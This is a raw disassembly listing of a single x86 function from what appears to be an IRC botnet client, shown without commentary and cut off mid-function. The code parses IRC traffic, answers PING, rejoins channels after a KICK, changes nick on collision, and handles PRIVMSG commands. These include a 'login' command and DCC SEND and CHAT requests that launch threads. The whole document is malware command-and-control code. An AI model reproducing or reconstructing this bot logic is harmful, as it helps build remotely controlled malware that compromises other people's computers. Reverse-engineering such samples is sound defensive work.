var_1EF8 = dword ptr -1EF8h
var_1EF4 = dword ptr -1EF4h
var_1EF0 = dword ptr -1EF0h
var_1EEC = byte ptr -1EECh
var_1DEC = byte ptr -1DECh
var_1D6C = dword ptr -1D6Ch
var_1D64 = dword ptr -1D64h
var_1D60 = dword ptr -1D60h
var_1D5C = dword ptr -1D5Ch
var_1D58 = dword ptr -1D58h
var_1D54 = dword ptr -1D54h
var_1D50 = dword ptr -1D50h
var_1D48 = byte ptr -1D48h
var_1D34 = byte ptr -1D34h
var_1C30 = byte ptr -1C30h
var_1BAC = dword ptr -1BACh
var_1BA8 = dword ptr -1BA8h
var_1BA4 = dword ptr -1BA4h
var_1BA0 = dword ptr -1BA0h
var_1B9C = dword ptr -1B9Ch
var_1B94 = byte ptr -1B94h
var_1B80 = byte ptr -1B80h
var_1A7C = byte ptr -1A7Ch
var_19FC = dword ptr -19FCh
var_19F8 = dword ptr -19F8h
var_19F4 = dword ptr -19F4h
var_19F0 = dword ptr -19F0h
var_19EC = dword ptr -19ECh
var_19E8 = dword ptr -19E8h
var_19E4 = byte ptr -19E4h
var_1964 = byte ptr -1964h
var_1924 = byte ptr -1924h
var_1824 = dword ptr -1824h
var_1820 = dword ptr -1820h
var_1814 = dword ptr -1814h
var_1810 = dword ptr -1810h
var_180C = dword ptr -180Ch
var_1808 = byte ptr -1808h
var_17D0 = byte ptr -17D0h
var_17B4 = byte ptr -17B4h
var_177C = byte ptr -177Ch
var_1778 = byte ptr -1778h
var_16F8 = byte ptr -16F8h
var_16B8 = byte ptr -16B8h
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = dword ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = byte ptr -1614h
var_1594 = byte ptr -1594h
var_1514 = dword ptr -1514h
var_1510 = dword ptr -1510h
var_150C = dword ptr -150Ch
var_1508 = dword ptr -1508h
var_1504 = byte ptr -1504h
var_14F4 = byte ptr -14F4h
var_1474 = byte ptr -1474h
var_13F4 = dword ptr -13F4h
var_13EC = dword ptr -13ECh
var_13E8 = dword ptr -13E8h
var_13E4 = dword ptr -13E4h
var_13E0 = dword ptr -13E0h
var_13DC = dword ptr -13DCh
var_13D8 = dword ptr -13D8h
var_13D4 = byte ptr -13D4h
var_1354 = byte ptr -1354h
var_12D4 = byte ptr -12D4h
var_1254 = dword ptr -1254h
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1248 = dword ptr -1248h
var_1244 = dword ptr -1244h
var_1240 = dword ptr -1240h
var_123C = dword ptr -123Ch
var_1238 = dword ptr -1238h
var_1230 = byte ptr -1230h
var_11B0 = byte ptr -11B0h
var_1130 = dword ptr -1130h
var_112C = dword ptr -112Ch
var_1128 = dword ptr -1128h
var_1120 = dword ptr -1120h
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1110 = dword ptr -1110h
var_110C = byte ptr -110Ch
var_108C = byte ptr -108Ch
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF8 = dword ptr -0FF8h
var_FF4 = dword ptr -0FF4h
var_FF0 = dword ptr -0FF0h
var_FEC = dword ptr -0FECh
var_FE8 = byte ptr -0FE8h
var_F68 = dword ptr -0F68h
var_F64 = dword ptr -0F64h
var_F60 = dword ptr -0F60h
var_F5C = dword ptr -0F5Ch
var_F58 = dword ptr -0F58h
var_F54 = byte ptr -0F54h
var_ED4 = dword ptr -0ED4h
var_ED0 = dword ptr -0ED0h
var_ECC = dword ptr -0ECCh
var_EC8 = dword ptr -0EC8h
var_EC4 = dword ptr -0EC4h
var_EC0 = byte ptr -0EC0h
var_E40 = dword ptr -0E40h
var_E3C = dword ptr -0E3Ch
var_E38 = dword ptr -0E38h
var_E34 = dword ptr -0E34h
var_E30 = byte ptr -0E30h
var_E10 = byte ptr -0E10h
var_E00 = byte ptr -0E00h
var_D80 = dword ptr -0D80h
var_D7C = byte ptr -0D7Ch
var_CFC = byte ptr -0CFCh
var_C7C = dword ptr -0C7Ch
var_C78 = dword ptr -0C78h
var_C74 = dword ptr -0C74h
var_C70 = dword ptr -0C70h
var_C6C = dword ptr -0C6Ch
var_C68 = dword ptr -0C68h
var_C64 = dword ptr -0C64h
var_C60 = dword ptr -0C60h
var_C5C = dword ptr -0C5Ch
var_C58 = dword ptr -0C58h
var_C54 = byte ptr -0C54h
var_BD4 = dword ptr -0BD4h
var_BD0 = dword ptr -0BD0h
var_BCC = dword ptr -0BCCh
var_BC8 = dword ptr -0BC8h
var_BC4 = byte ptr -0BC4h
var_B44 = dword ptr -0B44h
var_B40 = dword ptr -0B40h
var_B3C = dword ptr -0B3Ch
var_B38 = dword ptr -0B38h
var_B34 = dword ptr -0B34h
var_B30 = dword ptr -0B30h
var_B2C = byte ptr -0B2Ch
var_AAC = dword ptr -0AACh
var_AA8 = dword ptr -0AA8h
var_AA4 = dword ptr -0AA4h
var_AA0 = dword ptr -0AA0h
var_A9C = dword ptr -0A9Ch
var_A98 = dword ptr -0A98h
var_A94 = byte ptr -0A94h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = dword ptr -0A04h
var_A00 = dword ptr -0A00h
var_9FC = byte ptr -9FCh
var_97C = word ptr -97Ch
var_978 = dword ptr -978h
var_970 = dword ptr -970h
var_96C = dword ptr -96Ch
var_968 = dword ptr -968h
var_960 = byte ptr -960h
var_8FF = byte ptr -8FFh
var_8FE = byte ptr -8FEh
var_8FC = byte ptr -8FCh
var_8FB = byte ptr -8FBh
var_8F2 = byte ptr -8F2h
var_8F0 = byte ptr -8F0h
var_8EE = byte ptr -8EEh
var_8ED = byte ptr -8EDh
var_860 = byte ptr -860h
var_850 = byte ptr -850h
var_7D0 = byte ptr -7D0h
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_734 = dword ptr -734h
var_730 = dword ptr -730h
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_714 = dword ptr -714h
var_710 = byte ptr -710h
var_690 = dword ptr -690h
var_688 = dword ptr -688h
var_684 = dword ptr -684h
var_680 = dword ptr -680h
var_678 = dword ptr -678h
var_674 = dword ptr -674h
var_670 = dword ptr -670h
var_668 = dword ptr -668h
var_63C = dword ptr -63Ch
var_638 = word ptr -638h
var_624 = dword ptr -624h
var_620 = byte ptr -620h
var_5A0 = byte ptr -5A0h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_574 = dword ptr -574h
var_570 = byte ptr -570h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4E0 = dword ptr -4E0h
var_4D8 = dword ptr -4D8h
var_4D4 = dword ptr -4D4h
var_4D0 = dword ptr -4D0h
var_4C8 = byte ptr -4C8h
var_4BC = byte ptr -4BCh
var_484 = byte ptr -484h
var_474 = byte ptr -474h
var_3F4 = byte ptr -3F4h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_338 = byte ptr -338h
var_31C = word ptr -31Ch
var_31A = word ptr -31Ah
var_318 = dword ptr -318h
var_30C = byte ptr -30Ch
var_308 = dword ptr -308h
var_2FC = byte ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2E8 = byte ptr -2E8h
var_2E4 = byte ptr -2E4h
var_2E3 = byte ptr -2E3h
var_2E2 = byte ptr -2E2h
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = byte ptr -2C4h
var_C4 = byte ptr -0C4h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_93 = byte ptr -93h
var_92 = byte ptr -92h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_50 = byte ptr -50h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 5D88h
call sub_41BB20
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2C4]
push ebx
push eax
mov [ebp+var_AC], 3
mov [ebp+var_10], ebx
mov [ebp+var_A4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_2C8], ebx
call sub_41B590
push 1Bh
lea eax, [ebp+var_338]
push [ebp+arg_10]
push eax
call sub_41B5F0
add esp, 18h
cmp [ebp+arg_0], ebx
jz loc_401E94
push esi
lea eax, [ebp+var_4488]
push ebx
push eax
call sub_41B590
dec esi
lea eax, [ebp+var_4488]
push esi
push [ebp+arg_0]
push eax
call sub_41B5F0
lea eax, [ebp+var_4488]
push offset asc_42D12C ; " :"
push eax
call sub_41B900
mov [ebp+var_C], eax
lea eax, [ebp+var_4488]
push esi
push eax
lea eax, [ebp+var_4AF0]
push eax
call sub_41B5F0
mov esi, offset asc_42D128 ; " "
lea eax, [ebp+var_4AF0]
push esi
push eax
call sub_41C0F4
add esp, 34h
mov [ebp+var_90], eax
lea edi, [ebp+var_8C]
mov [ebp+var_A8], 1Fh
loc_401BA0: ; CODE XREF: sub_401ACD+E7�j
push esi
push ebx
call sub_41C0F4
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+var_A8]
pop ecx
jnz short loc_401BA0
mov esi, [ebp+var_90]
cmp esi, ebx
jz loc_401E94
cmp [ebp+var_8C], ebx
jz loc_401E94
push 100h
lea eax, [ebp+var_960]
push ebx
push eax
call sub_41B590
add esp, 0Ch
lea ecx, [ebp+var_14]
push 1Fh
pop edx
push 1
pop edi
loc_401BEE: ; CODE XREF: sub_401ACD+153�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_401C1A
cmp byte ptr [eax], 2Dh
jnz short loc_401C22
cmp [eax+2], bl
jnz short loc_401C22
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_960], 1
mov esi, [ebp+var_90]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_401C1A: ; CODE XREF: sub_401ACD+125�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_401BEE
loc_401C22: ; CODE XREF: sub_401ACD+12A�j
; sub_401ACD+12F�j
cmp [ebp+var_8ED], bl
jz short loc_401C2D
mov [ebp+var_8], edi
loc_401C2D: ; CODE XREF: sub_401ACD+15B�j
cmp [ebp+var_8F2], bl
jz short loc_401C3B
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_401C3B: ; CODE XREF: sub_401ACD+166�j
cmp byte ptr [esi], 0Ah
jz short loc_401C75
push 7Fh
lea eax, [ebp+var_E00]
push esi
push eax
call sub_41B5F0
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_C4]
push eax
call sub_41B5F0
lea eax, [ebp+var_C4]
push offset asc_42D124 ; "!"
push eax
call sub_41C0F4
add esp, 20h
loc_401C75: ; CODE XREF: sub_401ACD+171�j
push esi
push offset aPing ; "PING"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_401CC6
push [ebp+var_8C]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_409A2D
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_401D6A
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 10h
jmp loc_401D6A
; ---------------------------------------------------------------------------
loc_401CC6: ; CODE XREF: sub_401ACD+1B7�j
mov esi, [ebp+var_8C]
push esi
push offset a001 ; "001"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4099E1
push esi
push offset a005 ; "005"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4099E1
push esi
push offset a302 ; "302"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_401D2E
push offset a@ ; "@"
push [ebp+var_84]
call sub_41B900
pop ecx
cmp eax, ebx
pop ecx
jz short loc_401D6A
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_41B5F0
jmp short loc_401D67
; ---------------------------------------------------------------------------
loc_401D2E: ; CODE XREF: sub_401ACD+238�j
push esi
push offset a433 ; "433"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_401D71
push ebx
push dword_4290A0
push dword_42909C
push [ebp+arg_10]
call sub_40B08E
add esp, 10h
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_409A2D
loc_401D67: ; CODE XREF: sub_401ACD+25F�j
add esp, 0Ch
loc_401D6A: ; CODE XREF: sub_401ACD+1D8�j
; sub_401ACD+1F4�j ...
mov eax, edi
jmp loc_401E97
; ---------------------------------------------------------------------------
loc_401D71: ; CODE XREF: sub_401ACD+270�j
mov esi, [ebp+arg_18]
mov [ebp+var_A8], 3
mov edi, 80h
loc_401D83: ; CODE XREF: sub_401ACD+2DB�j
lea eax, [ebp+var_E00]
push eax
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_401DA0
mov [ebp+var_A4], 1
loc_401DA0: ; CODE XREF: sub_401ACD+2C7�j
add esi, edi
dec [ebp+var_A8]
jnz short loc_401D83
mov esi, [ebp+var_8C]
push esi
push offset aKick ; "KICK"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_401E9C
mov esi, [ebp+arg_18]
mov [ebp+arg_24], 3
loc_401DCF: ; CODE XREF: sub_401ACD+392�j
cmp [esi], bl
jz loc_401E5A
push 7Fh
lea eax, [ebp+var_E00]
push esi
push eax
call sub_41B5F0
lea eax, [ebp+var_C4]
add esp, 0Ch
test eax, eax
jz short loc_401E5A
cmp [ebp+var_84], ebx
jz short loc_401E5A
push [ebp+var_84]
lea eax, [ebp+var_C4]
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_401E5A
lea eax, [ebp+var_C4]
mov [esi], bl
push eax
lea eax, [ebp+var_2C4]
push offset unk_42D0B8
push eax
call sub_41B886
add esp, 0Ch
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_409A2D
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
add esp, 14h
loc_401E5A: ; CODE XREF: sub_401ACD+304�j
; sub_401ACD+324�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_401DCF
push [ebp+var_84]
push [ebp+arg_10]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_401E94
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8]
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_401E89: ; CODE XREF: sub_401ACD+612�j
; sub_401ACD+8D5�j ...
push [ebp+arg_4]
call sub_409A2D
loc_401E91: ; CODE XREF: sub_401ACD+253C�j
; sub_401ACD+2559�j ...
add esp, 10h
loc_401E94: ; CODE XREF: sub_401ACD+5B�j
; sub_401ACD+F1�j ...
push 1
loc_401E96: ; CODE XREF: sub_401ACD+2A62�j
pop eax
loc_401E97: ; CODE XREF: sub_401ACD+29F�j
; sub_401ACD+2A84�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401E9C: ; CODE XREF: sub_401ACD+2F2�j
push esi
push offset aNick ; "NICK"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_401FF2
mov eax, [ebp+var_88]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+arg_0], 3
mov [ebp+arg_24], eax
loc_401EC5: ; CODE XREF: sub_401ACD+44A�j
lea eax, [ebp+var_E00]
push eax
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_401F12
lea eax, [ebp+var_E00]
push 21h
push eax
call sub_41BFB0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_401F12
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_41BEB0
push [ebp+arg_1C]
push edi
call sub_41BEC0
add esp, 10h
mov edi, 80h
loc_401F12: ; CODE XREF: sub_401ACD+409�j
; sub_401ACD+420�j
add esi, edi
dec [ebp+arg_0]
jnz short loc_401EC5
lea eax, [ebp+var_C4]
test eax, eax
jz loc_401E94
cmp [ebp+arg_24], ebx
jz loc_401E94
push [ebp+arg_10]
lea eax, [ebp+var_C4]
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_401F5A
push 0Fh
push [ebp+arg_24]
push [ebp+arg_10]
call sub_41B5F0
loc_401F52: ; CODE XREF: sub_401ACD+1C36�j
add esp, 0Ch
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_401F5A: ; CODE XREF: sub_401ACD+476�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_401F5F: ; CODE XREF: sub_401ACD+4B3�j
cmp [edi], bl
jz short loc_401F76
lea eax, [ebp+var_E00]
push eax
push edi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_401F87
loc_401F76: ; CODE XREF: sub_401ACD+494�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_401F5F
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_401F87: ; CODE XREF: sub_401ACD+4A7�j
lea eax, [ebp+var_E00]
push 21h
push eax
call sub_41BFB0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz loc_401E94
push eax
call sub_41AFE0
push [ebp+arg_24]
mov edi, eax
call sub_41AFE0
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja loc_401E94
push [ebp+arg_0]
shl esi, 7
push [ebp+arg_24]
add esi, [ebp+arg_18]
push offset aSS ; ":%s%s"
push esi
call sub_41B886
push ebx
lea eax, [ebp+var_45EC]
push ebx
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_409A73
add esp, 24h
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_401FF2: ; CODE XREF: sub_401ACD+3DE�j
push esi
push offset aPart ; "PART"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_402014
push esi
push offset aQuit ; "QUIT"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40203B
loc_402014: ; CODE XREF: sub_401ACD+534�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_402019: ; CODE XREF: sub_401ACD+56C�j
cmp [edi], bl
jz short loc_40202F
push [ebp+var_90]
push edi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_402083
loc_40202F: ; CODE XREF: sub_401ACD+54E�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_402019
loc_40203B: ; CODE XREF: sub_401ACD+545�j
push [ebp+var_8C]
push offset a353 ; "353"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_4020E4
push [ebp+var_80]
push [ebp+arg_8]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40206F
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40206F: ; CODE XREF: sub_401ACD+597�j
push [ebp+var_80]
push offset unk_42D064
loc_402077: ; CODE XREF: sub_401ACD+28CD�j
; sub_401ACD+2C4D�j ...
call sub_415221
loc_40207C: ; CODE XREF: sub_401ACD+1BE2�j
pop ecx
loc_40207D: ; CODE XREF: sub_401ACD+7B70�j
pop ecx
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_402083: ; CODE XREF: sub_401ACD+560�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_2C4]
push offset unk_42D040
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
push [ebp+var_8C]
push offset aPart ; "PART"
call sub_41C070
add esp, 18h
test eax, eax
jnz loc_401E94
lea eax, [ebp+var_2C4]
push eax
mov eax, [ebp+var_90]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_401E89
; ---------------------------------------------------------------------------
loc_4020E4: ; CODE XREF: sub_401ACD+582�j
push [ebp+var_8C]
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi
call sub_41C070
pop ecx
mov edi, offset aNotice ; "NOTICE"
test eax, eax
pop ecx
jz short loc_402138
push [ebp+var_8C]
push edi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_402138
push [ebp+var_8C]
push offset dword_42D02C
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_409855
cmp dword_429088, ebx
jz loc_409855
loc_402138: ; CODE XREF: sub_401ACD+631�j
; sub_401ACD+643�j
push [ebp+var_8C]
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4022BE
push [ebp+var_8C]
push edi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4022BE
mov eax, [ebp+var_84]
inc [ebp+var_80]
push 4
mov [ebp+var_88], eax
pop esi
mov [ebp+var_AC], esi
loc_40217C: ; CODE XREF: sub_401ACD+8AD�j
; sub_401ACD+8E9�j ...
shl esi, 2
mov eax, [ebp+esi+var_90]
lea edi, [ebp+esi+var_90]
push eax
push offset dword_42D024
mov [ebp+arg_8], eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_402557
push [ebp+esi+var_8C]
push offset aSend_0 ; "SEND"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40241E
cmp [ebp+var_A4], ebx
jz loc_4023F7
push [ebp+esi+var_88]
mov edi, offset aS_2 ; "%s"
lea eax, [ebp+var_1B80]
push edi
push eax
call sub_41B886
add esp, 0Ch
lea eax, [ebp+var_1B94]
push [ebp+esi+var_84]
push edi
push eax
call sub_41B886
push [ebp+esi+var_80]
call sub_41B779
mov [ebp+var_19FC], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1B9C], eax
lea eax, [ebp+var_C4]
push 7Fh
push eax
lea eax, [ebp+var_1A7C]
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_19F4], eax
mov eax, [ebp+var_8]
mov [ebp+var_19F0], eax
lea eax, [ebp+var_1A7C]
push eax
lea eax, [ebp+var_1B80]
push eax
lea eax, [ebp+var_2C4]
push offset unk_42CFE8
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 1Ah
push eax
call sub_40B0F7
add esp, 1Ch
mov [ebp+var_19F8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1B9C]
push ebx
push eax
push offset sub_4161BD
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_19F8]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz loc_4023E6
loc_4022A8: ; CODE XREF: sub_401ACD+7EF�j
cmp [ebp+var_19EC], ebx
jnz loc_4083BD
push 32h
call dword_427078 ; Sleep
jmp short loc_4022A8
; ---------------------------------------------------------------------------
loc_4022BE: ; CODE XREF: sub_401ACD+67B�j
; sub_401ACD+691�j
push [ebp+var_8C]
push edi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_4022D7
mov [ebp+var_4], 1
loc_4022D7: ; CODE XREF: sub_401ACD+801�j
cmp [ebp+var_88], ebx
jz loc_401E94
push offset dword_42CFE4
push [ebp+var_88]
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_4022FE
cmp [ebp+var_4], ebx
jz short loc_40230A
loc_4022FE: ; CODE XREF: sub_401ACD+82A�j
lea eax, [ebp+var_C4]
mov [ebp+var_88], eax
loc_40230A: ; CODE XREF: sub_401ACD+82F�j
cmp [ebp+var_84], ebx
jz loc_401E94
inc [ebp+var_84]
jz short loc_402356
cmp [ebp+arg_10], ebx
jz short loc_402356
lea eax, [ebp+var_338]
push eax
call sub_41AFE0
push eax
lea eax, [ebp+var_338]
push [ebp+var_84]
push eax
call sub_41BE70
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
add esi, 4
mov [ebp+var_AC], esi
jmp short loc_40235C
; ---------------------------------------------------------------------------
loc_402356: ; CODE XREF: sub_401ACD+84F�j
; sub_401ACD+854�j
mov esi, [ebp+var_AC]
loc_40235C: ; CODE XREF: sub_401ACD+887�j
mov edi, [ebp+esi*4+var_90]
cmp edi, ebx
jz loc_401E94
push edi
push offset dword_42CFD8
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40217C
mov ecx, [ebp+var_88]
cmp byte ptr [ecx], 23h
jz short loc_4023A7
mov eax, ds:dword_4CB508
mov eax, off_429168[eax*4]
cmp [eax], bl
jz short loc_4023A7
push eax
push ecx
push offset dword_42CFBC
jmp loc_401E89
; ---------------------------------------------------------------------------
loc_4023A7: ; CODE XREF: sub_401ACD+8BC�j
; sub_401ACD+8CC�j
push edi
push offset dword_42CFB4
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40217C
mov eax, [ebp+esi*4+var_8C]
cmp eax, ebx
jz loc_40217C
mov ecx, [ebp+var_88]
cmp byte ptr [ecx], 23h
jz loc_40217C
push eax
push ecx
push offset dword_42CF9C
jmp loc_401E89
; ---------------------------------------------------------------------------
loc_4023E6: ; CODE XREF: sub_401ACD+7D5�j
; sub_401ACD+7853�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42CF60
jmp loc_4083AE
; ---------------------------------------------------------------------------
loc_4023F7: ; CODE XREF: sub_401ACD+6F9�j
lea eax, [ebp+var_C4]
push eax
push [ebp+esi+var_88]
push offset unk_42CF1C
loc_40240A: ; CODE XREF: sub_401ACD+7E2A�j
; sub_401ACD+7E91�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 10h
jmp loc_4083BD
; ---------------------------------------------------------------------------
loc_40241E: ; CODE XREF: sub_401ACD+6ED�j
push [ebp+esi+var_8C]
push offset aChat ; "CHAT"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40256D
cmp [ebp+var_A4], ebx
jz loc_402546
push 1Bh
call sub_40B33F
test eax, eax
pop ecx
jnz loc_402535
push [ebp+esi+var_84]
lea eax, [ebp+var_2AA8]
push offset aS_2 ; "%s"
push eax
call sub_41B886
push [ebp+esi+var_80]
call sub_41B779
mov [ebp+var_2910], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2AB0], eax
lea eax, [ebp+var_C4]
push 7Fh
push eax
lea eax, [ebp+var_2990]
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_2908], eax
mov eax, [ebp+var_8]
mov [ebp+var_2904], eax
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_2C4]
push offset unk_42CEF4
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 1Bh
push eax
call sub_40B0F7
add esp, 18h
mov [ebp+var_290C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2AB0]
push ebx
push eax
push offset sub_415C5A
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_290C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_402524
loc_40250E: ; CODE XREF: sub_401ACD+A55�j
cmp [ebp+var_2900], ebx
jnz loc_4083BD
push 32h
call dword_427078 ; Sleep
jmp short loc_40250E
; ---------------------------------------------------------------------------
loc_402524: ; CODE XREF: sub_401ACD+A3F�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42CEBC
jmp loc_4083AE
; ---------------------------------------------------------------------------
loc_402535: ; CODE XREF: sub_401ACD+982�j
lea eax, [ebp+var_C4]
push eax
push offset unk_42CE8C
jmp loc_4083AE
; ---------------------------------------------------------------------------
loc_402546: ; CODE XREF: sub_401ACD+972�j
lea eax, [ebp+var_C4]
push eax
push offset unk_42CE58
jmp loc_4083AE
; ---------------------------------------------------------------------------
loc_402557: ; CODE XREF: sub_401ACD+6D2�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, byte_429094
mov [edi], ecx
jnz loc_401E94
loc_40256D: ; CODE XREF: sub_401ACD+966�j
mov edi, [edi]
push edi
push offset aLogin ; "login"
mov [ebp+arg_8], edi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40985D
push edi
push offset asc_42CE54 ; "l"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40985D
cmp [ebp+var_A4], ebx
jnz short loc_4025BE
push [ebp+var_8C]
